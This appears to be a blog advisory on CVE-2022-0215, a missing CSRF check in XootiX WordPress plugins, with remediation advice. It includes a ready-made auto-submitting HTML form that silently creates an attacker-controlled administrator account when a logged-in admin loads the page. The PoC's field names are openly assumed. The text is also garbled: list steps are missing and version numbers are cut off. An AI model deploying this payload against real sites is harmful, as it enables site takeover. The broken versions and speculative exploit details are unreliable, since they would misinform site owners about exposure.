If you run a WordPress site with popular XootiX plugins—Login/Signup Popup, Waitlist Woocommerce (Back in Stock Notifier), or Side Cart Woocommerce (Ajax)—your site may be exposed to CVE-2022-0215, a dangerous Cross-Site Request Forgery (CSRF) vulnerability. This flaw makes it possible for an attacker to take full control of your site, including creating new administrator accounts.
Let’s break things down simply and see exactly how this happens.
What Is The Problem?
The XootiX plugins handle all sorts of useful shop functionality for your WooCommerce store. However, up until version 2.2 in Login/Signup Popup, version 2.5.1 in Waitlist Woocommerce, and version 2. in Side Cart Woocommerce, there’s a coding mistake in their admin settings code.
The plugins' /includes/xoo-framework/admin/class-xoo-admin-settings.php file has a function called save_settings. There’s supposed to be a security check to confirm that changes to plugin settings are coming from real site administrators using the dashboard. This security check is called a CSRF (Cross-Site Request Forgery) protection.
But in these versions, the CSRF protection is missing.
This means a *malicious actor* can trick an admin into visiting a link or page that silently sends a request to your site, changing plugin options *without their knowledge*. This could allow an attacker to change any option—including those that could let them create a new admin account!
Site admin, while logged in, visits this page.
3. The page silently sends a POST request to save_settings—with whatever values the attacker wants.
The site quietly accepts the settings change.
5. If "Add Admin User" is exposed, or a plugin setting controls user roles, the attacker could grant administrative access to their own account.
Below is a simplified version of the insecure code from class-xoo-admin-settings.php
public function save_settings() {
// There should be CSRF check here like:
// check_admin_referer('xoo_settings_nonce');
// But it's missing!
foreach ($_POST as $key => $value) {
update_option($key, $value);
}
}
No check_admin_referer means anyone can POST data here.
Proof-of-Concept (PoC) Exploit
*Disclaimer: This is for educational purposes only. Do not use it to attack others' sites!*
Suppose the plugin uses an option that lets it manage users (or exposes WP options in settings). An attacker could send this HTML to an admin:
<form id="attack" action="https://victim-site.com/wp-admin/admin.php?page=xoo-settings&action=save_settings"; method="POST">
<input type="hidden" name="new_user_login" value="xootixhacker">
<input type="hidden" name="new_user_pass" value="H4ck3rP@sswrd!">
<input type="hidden" name="new_user_email" value="attacker@example.com">
<input type="hidden" name="new_user_role" value="administrator">
</form>
<script>
document.getElementById('attack').submit();
</script>
When the admin (already logged in) visits this page, the form is submitted in the background. The site ‘thinks’ these settings are coming from a legitimate source.
All sites running these plugins
- Login/Signup Popup <= 2.2
Side Cart Woocommerce (Ajax) <= 2.
Regardless of other security plugins or a strong password, this CSRF issue trumps them by abusing trusted admin sessions.
What Should You Do?
1. Update Immediately!
Get the latest, patched versions
- Login/Signup Popup
- Waitlist Woocommerce
- Side Cart Woocommerce
2. Double-Check Administrators:
After patching, review your admin user list for unknown accounts.
3. Scan For Option Changes:
Check for weird configuration changes under the affected plugins or weird site behavior.
References & Further Reading
- Original WPScan Advisory on CVE-2022-0215
- Login/Signup Popup Plugin on WordPress.org
- Patchstack Vulnerability Report
- CSRF Explained for Beginners
In Summary
CSRF bugs in WordPress plugins like XootiX's can be a one-click site takeover risk. Always update plugins quickly, monitor your admin user list, and stay subscribed to security feeds for the latest vulnerabilities.
Timeline
Published on: 01/18/2022 17:15:00 UTC
Last modified on: 01/24/2022 20:31:00 UTC